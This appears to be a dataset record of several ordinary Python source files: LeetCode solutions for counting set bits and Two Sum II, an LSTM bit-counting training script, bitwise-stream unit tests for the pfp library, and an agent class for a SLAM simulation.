51e4fed988ec3b764cbf12a2b577969e31033754 | 3,630 | py | Python | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 18 | 2019-08-01T07:45:02.000Z | 2022-03-31T18:05:44.000Z | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Bit_Manipulation/number-of-1-bits.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 15 | 2019-12-29T08:46:20.000Z | 2022-03-08T14:14:05.000Z | """
191. Number of 1 Bits (Hamming weight)
Easy
Share
Write a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).
Note:
Note that in some languages, such as Java, there is no unsigned integer type. In this case, the input will be given as a signed integer type. It should not affect your implementation, as the integer's internal binary representation is the same, whether it is signed or unsigned.
In Java, the compiler represents the signed integers using 2's complement notation. Therefore, in Example 3, the input represents the signed integer. -3.
Example 1:
Input: n = 00000000000000000000000000001011
Output: 3
Explanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.
Example 2:
Input: n = 00000000000000000000000010000000
Output: 1
Explanation: The input binary string 00000000000000000000000010000000 has a total of one '1' bit.
Example 3:
Input: n = 11111111111111111111111111111101
Output: 31
Explanation: The input binary string 11111111111111111111111111111101 has a total of thirty one '1' bits.
Constraints:
The input must be a binary string of length 32.
Follow up: If this function is called many times, how would you optimize it?
"""
# V0
# The bin() method returns the binary string equivalent to the given integer.
# V0'
# IDEA : bit manipulation : n&(n-1) CAN REMOVE LAST 1 PER LOOP
# https://github.com/labuladong/fucking-algorithm/blob/master/%E7%AE%97%E6%B3%95%E6%80%9D%E7%BB%B4%E7%B3%BB%E5%88%97/%E5%B8%B8%E7%94%A8%E7%9A%84%E4%BD%8D%E6%93%8D%E4%BD%9C.md
# V1
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# IDEA : BITWISE OPERATOR
# https://wiki.python.org/moin/BitwiseOperators
# x & y
# Does a "bitwise and". Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0.
# e.g. :
# 111 & 111 = 111
# 111 & 100 = 100
# 1 & 0 = 0
# 1 & 1 = 1
# 0 & 0 = 0
# @param n, an integer
# @return an integer
# V1'
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# @param n, an integer
# @return an integer
# V1''
# https://blog.csdn.net/coder_orz/article/details/51323188
# IDEA
# The bin() method returns the binary string equivalent to the given integer.
# V2
# Time: O(logn) = O(32)
# Space: O(1)
# @param n, an integer
# @return an integer
| 28.359375 | 278 | 0.637741 | """
191. Number of 1 Bits (Hamming weight)
Easy
Share
Write a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).
Note:
Note that in some languages, such as Java, there is no unsigned integer type. In this case, the input will be given as a signed integer type. It should not affect your implementation, as the integer's internal binary representation is the same, whether it is signed or unsigned.
In Java, the compiler represents the signed integers using 2's complement notation. Therefore, in Example 3, the input represents the signed integer. -3.
Example 1:
Input: n = 00000000000000000000000000001011
Output: 3
Explanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.
Example 2:
Input: n = 00000000000000000000000010000000
Output: 1
Explanation: The input binary string 00000000000000000000000010000000 has a total of one '1' bit.
Example 3:
Input: n = 11111111111111111111111111111101
Output: 31
Explanation: The input binary string 11111111111111111111111111111101 has a total of thirty one '1' bits.
Constraints:
The input must be a binary string of length 32.
Follow up: If this function is called many times, how would you optimize it?
"""
# V0
# The bin() method returns the binary string equivalent to the given integer.
class Solution(object):
    def hammingWeight(self, n):
        """Return the Hamming weight of n (number of set bits).

        :type n: int
        :rtype: int
        """
        # Count the '1' characters in the binary representation.
        return sum(1 for digit in bin(n) if digit == '1')
# V0'
# IDEA : bit manipulation : n&(n-1) CAN REMOVE LAST 1 PER LOOP
# https://github.com/labuladong/fucking-algorithm/blob/master/%E7%AE%97%E6%B3%95%E6%80%9D%E7%BB%B4%E7%B3%BB%E5%88%97/%E5%B8%B8%E7%94%A8%E7%9A%84%E4%BD%8D%E6%93%8D%E4%BD%9C.md
class Solution:
    def hammingWeight(self, n: int) -> int:
        """Count set bits with Kernighan's trick.

        ``n & (n - 1)`` clears the lowest set bit, so the loop runs once
        per set bit rather than once per bit position.
        """
        total = 0
        while n:
            n &= n - 1  # drop the lowest set bit
            total += 1
        return total
# V1
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
# IDEA : BITWISE OPERATOR
# https://wiki.python.org/moin/BitwiseOperators
# x & y
# Does a "bitwise and". Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0.
# e.g. :
# 111 & 111 = 111
# 111 & 100 = 100
# 1 & 0 = 0
# 1 & 1 = 1
# 0 & 0 = 0
class Solution:
    # @param n, an integer
    # @return an integer
    def hammingWeight(self, n):
        """Shift n right one position at a time, summing the low bits."""
        bits = 0
        while n:
            bits, n = bits + (n & 1), n >> 1
        return bits
# V1'
# http://bookshadow.com/weblog/2015/03/10/leetcode-number-1-bits/
class Solution:
    # @param n, an integer
    # @return an integer
    def hammingWeight(self, n):
        """Count set bits; each iteration clears the lowest set bit."""
        set_bits = 0
        while n != 0:
            n, set_bits = n & (n - 1), set_bits + 1
        return set_bits
# V1''
# https://blog.csdn.net/coder_orz/article/details/51323188
# IDEA
# The bin() method returns the binary string equivalent to the given integer.
class Solution(object):
    def hammingWeight(self, n):
        """Count set bits via the binary string form of n.

        :type n: int
        :rtype: int
        """
        # format(n, 'b') is bin(n) without the '0b' prefix.
        return format(n, 'b').count('1')
# V2
# Time: O(logn) = O(32)
# Space: O(1)
class Solution(object):
    # @param n, an integer
    # @return an integer
    def hammingWeight(self, n):
        """O(number of set bits): strip the lowest set bit until n is zero."""
        stripped = 0
        while n:
            stripped += 1
            n &= n - 1
        return stripped
| 752 | 248 | 236 |
0c5221c48bef1567e6b1d71ee6d2abedfba75e10 | 5,014 | py | Python | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | lstm_count.py | krrish94/learn_tensorflow | b5725bfbd09911e7c7342ab76eea07e294d5573c | [
"MIT"
] | null | null | null | # LSTM to count the number of '1's in a binary string
# Reference: https://becominghuman.ai/a-noobs-guide-to-implementing-rnn-lstm-using-tensorflow-1907a5bbb1fa
import numpy as np
from random import shuffle
import tensorflow as tf
"""
Parameters
"""
# Seed for all RNGs
rng_seed = 12345
np.random.seed(rng_seed)
tf.set_random_seed(rng_seed)
# Length of each binary string (i.e., length of each input sequence)
seq_len = 15
# Maximum range (i.e., max val of the integer reprsented by the bit string)
# Note that, max val is 2**num_range
num_range = 15
# Train split (fraction of data to be used for training)
train_split = 0.8
# Number of train samples
num_samples = 2 ** num_range
num_train = int(np.floor(train_split * num_samples))
num_test = num_samples - num_train
# Dimensions
dim_input = 1
dim_output = num_range + 1 # Since num of bits can only be in the range [0, num_range]
# Model parameters
num_hidden = 10
# Other hyperparameters
batch_size = 50
learning_rate = 0.01
momentum = 0.09
beta1 = 0.7
num_epochs = 10
num_train_batches = int(np.floor(float(num_train) / float(batch_size)))
num_test_batches = int(np.floor(float(num_test) / float(batch_size)))
# Verbosity controls
print_experiment_summary = True
if print_experiment_summary:
print('Total number of samples:', num_samples)
print('Train samples:', num_train)
print('Test samples:', num_test)
print('Batch size:', batch_size)
print('Train batches:', num_train_batches)
print('Test batches:', num_test_batches)
print('Max epochs:', num_epochs)
print_train_every = 100
print_test_every = 10
"""
Generate training data
"""
# Generate all strings of numbers in the interval [0, 2**num_range]
dataset = ['{0:^0{str_len}b}'.format(i, str_len = seq_len) for i in range(2**num_range)]
# Convert the string to a set of integers
dataset = np.array([[[int(j)] for j in list(dataset[i])] for i in range(len(dataset))])
# print(dataset)
labels_helper = np.array([[np.sum(num)] for num in dataset])
labels = np.zeros((num_samples, dim_output))
cur = 0
for ind in labels_helper:
labels[cur][ind] = 1.0
cur += 1
# print(labels)
"""
Build the computation graph
"""
data = tf.placeholder(tf.float32, [None, seq_len, dim_input])
target = tf.placeholder(tf.float32, [None, dim_output])
recurrent_unit = tf.contrib.rnn.LSTMCell(num_hidden)
val, _ = tf.nn.dynamic_rnn(recurrent_unit, data, dtype = tf.float32)
val = tf.transpose(val, [1, 0, 2])
last = tf.gather(val, int(val.get_shape()[0]) - 1)
weight_fc = tf.Variable(tf.truncated_normal([num_hidden, int(target.get_shape()[1])]))
bias_fc = tf.Variable(tf.constant(0.1, shape = [target.get_shape()[1]]))
prediction = tf.nn.softmax(tf.matmul(last, weight_fc) + bias_fc)
cross_entropy = - tf.reduce_sum(target * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))
loss = tf.train.AdamOptimizer(learning_rate = learning_rate, beta1 = beta1).minimize(cross_entropy)
# Accuracy computation
mistakes = tf.not_equal(tf.argmax(target, 1), tf.argmax(prediction, 1))
error = tf.reduce_mean(tf.cast(mistakes, tf.float32))
"""
Execute graph
"""
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
epoch = 0
# 'Epoch' loop
while epoch < num_epochs:
batch = 0
# Shuffle train data
train_order = np.random.permutation(num_train)
# 'Iteration' loop
train_error_this_epoch = 0.0
train_error_temp = 0.0
while batch < num_train_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
inds = train_order[startIdx:endIdx]
# input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx] # no shuffle
input_batch, label_batch = dataset[inds], labels[inds]
net_out = sess.run([loss, error], feed_dict = {data: input_batch, target: label_batch})
train_error_temp += net_out[1]
train_error_this_epoch += net_out[1]
if batch % print_train_every == 0:
print('Epoch: ', epoch, 'Error: ', train_error_temp/float(print_train_every))
train_error_temp = 0.0
batch += 1
# print('Epoch:', epoch, 'Full train set:', train_error_this_epoch/float(num_train))
# Test
if epoch % 2 == 0:
test_error_this_epoch = 0.0
test_error_temp = 0.0
while batch < num_train_batches + num_test_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx]
net_out = sess.run([error, prediction], feed_dict = {data: input_batch, target: label_batch})
test_error_temp += net_out[0]
test_error_this_epoch += net_out[0]
if batch % print_test_every == 0:
print('Epoch: ', epoch, 'Error: ', test_error_temp/float(print_test_every))
test_error_temp = 0.0
random_disp = np.random.randint(batch_size)
print(np.squeeze(input_batch[random_disp]))
print('Pred:', np.argmax(net_out[1][random_disp]), 'GT:', \
np.argmax(label_batch[random_disp]))
batch += 1
print('Epoch: ', epoch, 'Full test set:', test_error_this_epoch/float(num_test))
epoch += 1
| 28.327684 | 106 | 0.719186 | # LSTM to count the number of '1's in a binary string
# Reference: https://becominghuman.ai/a-noobs-guide-to-implementing-rnn-lstm-using-tensorflow-1907a5bbb1fa
import numpy as np
from random import shuffle
import tensorflow as tf
"""
Parameters
"""
# Seed for all RNGs
rng_seed = 12345
np.random.seed(rng_seed)
tf.set_random_seed(rng_seed)
# Length of each binary string (i.e., length of each input sequence)
seq_len = 15
# Maximum range (i.e., max val of the integer reprsented by the bit string)
# Note that, max val is 2**num_range
num_range = 15
# Train split (fraction of data to be used for training)
train_split = 0.8
# Number of train samples
num_samples = 2 ** num_range
num_train = int(np.floor(train_split * num_samples))
num_test = num_samples - num_train
# Dimensions
dim_input = 1
dim_output = num_range + 1 # Since num of bits can only be in the range [0, num_range]
# Model parameters
num_hidden = 10
# Other hyperparameters
batch_size = 50
learning_rate = 0.01
momentum = 0.09
beta1 = 0.7
num_epochs = 10
num_train_batches = int(np.floor(float(num_train) / float(batch_size)))
num_test_batches = int(np.floor(float(num_test) / float(batch_size)))
# Verbosity controls
print_experiment_summary = True
if print_experiment_summary:
print('Total number of samples:', num_samples)
print('Train samples:', num_train)
print('Test samples:', num_test)
print('Batch size:', batch_size)
print('Train batches:', num_train_batches)
print('Test batches:', num_test_batches)
print('Max epochs:', num_epochs)
print_train_every = 100
print_test_every = 10
"""
Generate training data
"""
# Generate all strings of numbers in the interval [0, 2**num_range]
dataset = ['{0:^0{str_len}b}'.format(i, str_len = seq_len) for i in range(2**num_range)]
# Convert the string to a set of integers
dataset = np.array([[[int(j)] for j in list(dataset[i])] for i in range(len(dataset))])
# print(dataset)
labels_helper = np.array([[np.sum(num)] for num in dataset])
labels = np.zeros((num_samples, dim_output))
cur = 0
for ind in labels_helper:
labels[cur][ind] = 1.0
cur += 1
# print(labels)
"""
Build the computation graph
"""
data = tf.placeholder(tf.float32, [None, seq_len, dim_input])
target = tf.placeholder(tf.float32, [None, dim_output])
recurrent_unit = tf.contrib.rnn.LSTMCell(num_hidden)
val, _ = tf.nn.dynamic_rnn(recurrent_unit, data, dtype = tf.float32)
val = tf.transpose(val, [1, 0, 2])
last = tf.gather(val, int(val.get_shape()[0]) - 1)
weight_fc = tf.Variable(tf.truncated_normal([num_hidden, int(target.get_shape()[1])]))
bias_fc = tf.Variable(tf.constant(0.1, shape = [target.get_shape()[1]]))
prediction = tf.nn.softmax(tf.matmul(last, weight_fc) + bias_fc)
cross_entropy = - tf.reduce_sum(target * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))
loss = tf.train.AdamOptimizer(learning_rate = learning_rate, beta1 = beta1).minimize(cross_entropy)
# Accuracy computation
mistakes = tf.not_equal(tf.argmax(target, 1), tf.argmax(prediction, 1))
error = tf.reduce_mean(tf.cast(mistakes, tf.float32))
"""
Execute graph
"""
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
epoch = 0
# 'Epoch' loop
while epoch < num_epochs:
batch = 0
# Shuffle train data
train_order = np.random.permutation(num_train)
# 'Iteration' loop
train_error_this_epoch = 0.0
train_error_temp = 0.0
while batch < num_train_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
inds = train_order[startIdx:endIdx]
# input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx] # no shuffle
input_batch, label_batch = dataset[inds], labels[inds]
net_out = sess.run([loss, error], feed_dict = {data: input_batch, target: label_batch})
train_error_temp += net_out[1]
train_error_this_epoch += net_out[1]
if batch % print_train_every == 0:
print('Epoch: ', epoch, 'Error: ', train_error_temp/float(print_train_every))
train_error_temp = 0.0
batch += 1
# print('Epoch:', epoch, 'Full train set:', train_error_this_epoch/float(num_train))
# Test
if epoch % 2 == 0:
test_error_this_epoch = 0.0
test_error_temp = 0.0
while batch < num_train_batches + num_test_batches:
startIdx = batch*batch_size
endIdx = (batch+1)*batch_size
input_batch, label_batch = dataset[startIdx:endIdx], labels[startIdx:endIdx]
net_out = sess.run([error, prediction], feed_dict = {data: input_batch, target: label_batch})
test_error_temp += net_out[0]
test_error_this_epoch += net_out[0]
if batch % print_test_every == 0:
print('Epoch: ', epoch, 'Error: ', test_error_temp/float(print_test_every))
test_error_temp = 0.0
random_disp = np.random.randint(batch_size)
print(np.squeeze(input_batch[random_disp]))
print('Pred:', np.argmax(net_out[1][random_disp]), 'GT:', \
np.argmax(label_batch[random_disp]))
batch += 1
print('Epoch: ', epoch, 'Full test set:', test_error_this_epoch/float(num_test))
epoch += 1
| 0 | 0 | 0 |
883d14b1461d66ac48c971c5108dbca8ed428a76 | 1,445 | py | Python | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | python/167-TwoSumII.py | vermouth1992/Leetcode | 0d7dda52b12f9e01d88fc279243742cd8b4bcfd1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution and you may not use the same element twice.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
"""
使用2个指针,一开始分别指向第一个数和最后一个数,当两者之和小于target时,左指针右移,当两者之和大于target时,右指针左移
时间:O(n),空间:O(1), 可能有O(log n)的解法吗???
类似问题:653. Two Sum IV - Input is a BST
"""
if __name__ == '__main__':
# for sanity check
nums = [2, 7, 11, 15]
assert(Solution().twoSum(nums, 9) == [1, 2]) | 32.840909 | 137 | 0.640138 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.
The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.
Please note that your returned answers (both index1 and index2) are not zero-based.
You may assume that each input would have exactly one solution and you may not use the same element twice.
Input: numbers={2, 7, 11, 15}, target=9
Output: index1=1, index2=2
"""
"""
使用2个指针,一开始分别指向第一个数和最后一个数,当两者之和小于target时,左指针右移,当两者之和大于target时,右指针左移
时间:O(n),空间:O(1), 可能有O(log n)的解法吗???
类似问题:653. Two Sum IV - Input is a BST
"""
class Solution(object):
    def twoSum(self, numbers, target):
        """Two-pointer scan over a sorted list; returns 1-based indices.

        :type numbers: List[int]
        :type target: int
        :rtype: List[int]
        """
        lo, hi = 0, len(numbers) - 1
        while lo < hi:
            total = numbers[lo] + numbers[hi]
            if total == target:
                # Problem statement wants 1-based positions.
                return [lo + 1, hi + 1]
            if total < target:
                lo += 1
            else:
                hi -= 1
        return None
if __name__ == '__main__':
# for sanity check
nums = [2, 7, 11, 15]
assert(Solution().twoSum(nums, 9) == [1, 2]) | 0 | 553 | 24 |
b4420d340795295b5c6df067aacad1f7856079ba | 5,015 | py | Python | tests/test_bitwrap.py | bannsec/pfp | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | 1 | 2018-01-01T12:52:33.000Z | 2018-01-01T12:52:33.000Z | tests/test_bitwrap.py | richinseattle/py010fuzz | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | null | null | null | tests/test_bitwrap.py | richinseattle/py010fuzz | 32f2d34fdec1c70019fa83c7006d5e3be0f92fcd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
import os
import six
import struct
import sys
import unittest
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import pfp
import pfp.errors
from pfp.fields import *
import pfp.utils
from pfp.bitwrap import BitwrappedStream
import utils
if __name__ == "__main__":
unittest.main()
| 30.579268 | 96 | 0.624526 | #!/usr/bin/env python
# encoding: utf-8
import os
import six
import struct
import sys
import unittest
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import pfp
import pfp.errors
from pfp.fields import *
import pfp.utils
from pfp.bitwrap import BitwrappedStream
import utils
class TestBitwrap(unittest.TestCase):
    """Tests for pfp.bitwrap.BitwrappedStream: byte reads, bit reads in
    padded/unpadded mode, padded bit writes, and unconsumed-range tracking.

    Fix: ``test_bits_read_unpadded`` was defined twice with byte-identical
    bodies; Python silently keeps only the last definition, so the duplicate
    has been removed.
    """
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def test_bytes_read(self):
        """Whole-byte reads pass straight through to the wrapped stream."""
        stream = six.BytesIO(pfp.utils.binary("abcd"))
        bitwrapped = BitwrappedStream(stream)
        res = bitwrapped.read(4)
        self.assertEqual(pfp.utils.binary("abcd"), res)
    def test_bits_read1(self):
        """Reading 8 bits yields the bits of the first byte, MSB first."""
        stream = six.BytesIO(pfp.utils.binary(chr(int("01010101", 2))))
        bitwrapped = BitwrappedStream(stream)
        res = bitwrapped.read_bits(8)
        self.assertEqual([0, 1, 0, 1, 0, 1, 0, 1], res)
    def test_bits_read2_padded1(self):
        """In padded mode, bit reads restart at the next byte boundary."""
        stream = six.BytesIO(pfp.utils.binary(chr(int("11110000", 2)) + chr(int("10101010", 2))))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.padded = True
        res = bitwrapped.read_bits(4)
        self.assertEqual([1, 1, 1, 1], res)
        res = bitwrapped.read_bits(3)
        self.assertEqual([0, 0, 0], res)
        # 4+3 bits consumed: the next bit read skips to the second byte.
        res = bitwrapped.read_bits(4)
        self.assertEqual([0, 1, 0, 1], res)
        res = bitwrapped.read_bits(5)
        self.assertEqual([0, 1, 0, 1, 0], res)
    def test_bits_read2_padded2(self):
        """In padded mode, a byte read after a bit read skips the partial byte."""
        stream = six.BytesIO(pfp.utils.binary(chr(int("11110000", 2)) + chr(int("10101010", 2))))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.padded = True
        res = bitwrapped.read_bits(4)
        self.assertEqual([1, 1, 1, 1], res)
        next_byte = bitwrapped.read(1)
        self.assertEqual(pfp.utils.binary(chr(int("10101010", 2))), next_byte)
    def test_bits_read_unpadded(self):
        """Unpadded bit reads carry leftover bits across byte boundaries."""
        stream = six.BytesIO(pfp.utils.binary(chr(int("11110000", 2)) + chr(int("10101010", 2))))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.padded = False
        res = bitwrapped.read_bits(4)
        self.assertEqual([1, 1, 1, 1], res)
        # The next byte read is assembled from the remaining 4 bits plus the
        # first 4 bits of the following byte.
        res = bitwrapped.read(1)
        self.assertEqual(pfp.utils.binary(chr(int("00001010", 2))), res)
        res = bitwrapped.read_bits(4)
        self.assertEqual([1, 0, 1, 0], res)
    def test_bits_write_padded(self):
        """In padded mode, a byte write after a bit write zero-pads the
        partial byte first."""
        stream = six.BytesIO()
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.padded = True
        bitwrapped.write_bits([1, 1, 0, 1])
        # should go to a new byte now, zero padded after the
        # 1101 bits
        bitwrapped.write(pfp.utils.binary("hello"))
        self.assertEqual(stream.getvalue(), pfp.utils.binary(chr(int("11010000", 2)) + "hello"))
    def test_unconsumed_ranges1(self):
        """Seeking past data leaves half-open unconsumed ranges behind."""
        stream = six.BytesIO(pfp.utils.binary("A" * 100))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.read(10)
        bitwrapped.seek(bitwrapped.tell() + 10)
        bitwrapped.read(10)
        bitwrapped.seek(bitwrapped.tell() + 10)
        bitwrapped.read(10)
        uranges = bitwrapped.unconsumed_ranges()
        # test (11,20]
        self.assertEqual(len(uranges[11]), 1)
        self.assertEqual(len(uranges[10]), 0)
        self.assertEqual(len(uranges[19]), 1)
        self.assertEqual(len(uranges[20]), 0)
        # test (31,40]
        self.assertEqual(len(uranges[31]), 1)
        self.assertEqual(len(uranges[30]), 0)
        self.assertEqual(len(uranges[39]), 1)
        self.assertEqual(len(uranges[40]), 0)
    def test_unconsumed_ranges2(self):
        """A seek alone (no second read) is enough to record a range."""
        stream = six.BytesIO(pfp.utils.binary("A" * 100))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.read(10)
        bitwrapped.seek(bitwrapped.tell() + 10)
        # it should not need a second read to add the
        # unconsumed range
        uranges = bitwrapped.unconsumed_ranges()
        self.assertEqual(len(uranges), 1)
        # test (11,20]
        self.assertEqual(len(uranges[11]), 1)
        self.assertEqual(len(uranges[10]), 0)
        self.assertEqual(len(uranges[19]), 1)
        self.assertEqual(len(uranges[20]), 0)
    def test_unconsumed_ranges3(self):
        """Plain sequential reading produces no unconsumed ranges."""
        stream = six.BytesIO(pfp.utils.binary("A" * 100))
        bitwrapped = BitwrappedStream(stream)
        bitwrapped.read(10)
        uranges = bitwrapped.unconsumed_ranges()
        self.assertEqual(len(uranges), 0)
if __name__ == "__main__":
unittest.main()
| 4,284 | 16 | 370 |
10ce8036ec86918bb92e84b481c7b92c24d378cf | 8,054 | py | Python | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | 3 | 2021-12-12T22:48:46.000Z | 2022-01-19T22:49:52.000Z | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | null | null | null | slam/agent.py | FedeClaudi/Slam | 37911b410a85f3884bf0f49c2a5a4a4310efed92 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle
import numpy as np
from typing import List, Tuple
from loguru import logger
from kino.geometry.point import Point
from kino.geometry import Vector
from myterial import blue_dark, pink
from slam.environment import Environment
from slam.map import Map
from slam.ray import Ray
from slam.behavior import (
BehavioralRoutine,
Explore,
Backtrack,
SpinScan,
NavigateToNode,
)
from slam.planner import Planner
| 29.394161 | 86 | 0.507822 | import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle
import numpy as np
from typing import List, Tuple
from loguru import logger
from kino.geometry.point import Point
from kino.geometry import Vector
from myterial import blue_dark, pink
from slam.environment import Environment
from slam.map import Map
from slam.ray import Ray
from slam.behavior import (
BehavioralRoutine,
Explore,
Backtrack,
SpinScan,
NavigateToNode,
)
from slam.planner import Planner
class Agent:
# geometry/drawing
width: int = 3
height: int = 4
head_width: float = 1.5
color: str = blue_dark
head_color: str = pink
# movement
speed: float = 1
max_turn: int = 60
# LIDAR rays
ray_length: int = 14
collision_distance: int = 6
# SLAM
update_map_every: int = 25 # update map every n timesteps
def __init__(
self,
environment: Environment,
x: float = 0,
y: float = 0,
angle: float = 0,
):
self.environment = environment
if self.environment.is_point_in_obstacle(Point(x, y)):
logger.info(
"Initial Agent point was in an obstacle, picked a random one instead."
)
point = self.environment.random_point()
x, y = point.x, point.y
self.x: float = x
self.y: float = y
self.angle: float = angle
self.trajectory = dict(x=[x], y=[y])
# make rays
self.rays = [
Ray(self, angle, self.ray_length)
for angle in (-40, -20, 0, 20, 40)
]
# update rays
for ray in self.rays:
ray.scan(self.environment.obstacles)
# initiliaze map
self.map = Map(self)
self._current_routine: BehavioralRoutine = Explore()
# initialize planner
self.planner = Planner()
self.n_time_steps = 0
self.routine_name: List[
int
] = [] # store which routine is done at each timestep
# -------------------------------- kinematics -------------------------------- #
@property
def COM(self) -> Vector:
return Vector(self.x, self.y)
@property
def head_position(self) -> np.ndarray:
head_shift = Vector(self.height / 2, 0).rotate(self.angle)
return (self.COM + head_shift).as_array()
def set(self, **kwargs):
for k, val in kwargs.items():
if k in self.__dict__.keys():
setattr(self, k, val)
else:
raise ValueError(f'Cannot set value for "{k}"')
# --------------------------------- behavior --------------------------------- #
def check_touching(self) -> Tuple[List[bool], float]:
"""
Checks which of the rays are touching an object and returns the
distance of the closest objct
"""
touching_distance: float = self.collision_distance * 2
touching = [False for n in range(len(self.rays))]
for n, ray in enumerate(self.rays):
if ray.contact_point is not None:
if ray.contact_point.distance < self.collision_distance:
touching[n] = True
touching_distance = min(
touching_distance, ray.contact_point.distance
)
return touching, touching_distance
def select_routine(self, touching: List[bool], touching_distance: float):
"""
Selects which routine to execute
"""
if self._current_routine.name == "exploration":
if touching_distance < self.speed:
# backtrack: avoid collision
if touching[0] and touching[-1]:
self._current_routine = Backtrack()
elif np.random.rand() < 0.005 and np.any(touching):
# do a spin
self._current_routine = SpinScan()
elif np.random.rand() < 0.012 and self.n_time_steps > 10:
# explore an 'uncertain' node in the graph
self.slam()
node = self.planner.get_uncertain_node()
if node is not None:
self._current_routine = NavigateToNode(
self, self.planner, node
)
# elif np.any(touching) and np.random.rand() < .4:
# follow object
# TODO follow object walls
else:
if self._current_routine.completed:
self._current_routine = Explore()
def move(self):
"""
Moves the agent
"""
# check if we are within collision distance for any ray
touching, touching_distance = self.check_touching()
# get movement commands
self.select_routine(touching, touching_distance)
speed, steer_angle = self._current_routine.get_commands(
self, touching, touching_distance
)
# store variables and move
self._current_speed = speed
self._current_omega = steer_angle
self.x += speed * np.cos(np.radians(self.angle))
self.y += speed * np.sin(np.radians(self.angle))
self.angle += steer_angle
self.trajectory["x"].append(self.x)
self.trajectory["y"].append(self.y)
def update(self):
# move
self.move()
# update rays
for ray in self.rays:
ray.scan(self.environment.obstacles)
# update map entries
self.map.add(
*[
ray.contact_point
for ray in self.rays
if ray.contact_point is not None
]
)
# generate map
if self.n_time_steps % self.update_map_every == 0:
self.slam()
self.n_time_steps += 1
self.routine_name.append(self._current_routine.ID)
# ------------------------------- slam/planning ------------------------------ #
def slam(self):
""" Builds a map + agent localization and activates the planner
"""
logger.debug(f"Agent, SLAM at timestep: {self.n_time_steps}")
self.map.build()
self.planner.build(list(self.map.grid_points.values()))
# ----------------------------------- draw ----------------------------------- #
def draw(self, ax: plt.Axes, just_agent: bool = False):
"""
Draws the agent as a rectangle with a circle for head
"""
# draw body, get rectangle corner first
body_shift = Vector(-self.height / 2, -self.width / 2).rotate(
self.angle
)
ax.add_artist(
Rectangle(
(self.COM + body_shift).as_array(),
self.height,
self.width,
self.angle,
facecolor=self.color,
lw=1,
edgecolor="k",
zorder=100,
)
)
# draw head
ax.add_artist(
Circle(
self.head_position,
self.head_width,
facecolor=self.head_color,
lw=1,
edgecolor="k",
zorder=100,
)
)
if not just_agent:
# add rays
for ray in self.rays:
ray.draw(ax)
# draw trace
ax.plot(
self.trajectory["x"],
self.trajectory["y"],
lw=0.5,
color="k",
zorder=-1,
alpha=0.5,
label="trajectory",
)
# mark routine at each timestep
# ax.scatter(
# self.trajectory["x"][:-1],
# self.trajectory["y"][:-1],
# c=self.routine_name,
# s=20,
# cmap='Dark2',
# zorder=0,
# alpha=1,
# lw=.5,
# ec='k',
# vmin=-1, vmax=10
# )
| 2,058 | 5,466 | 23 |
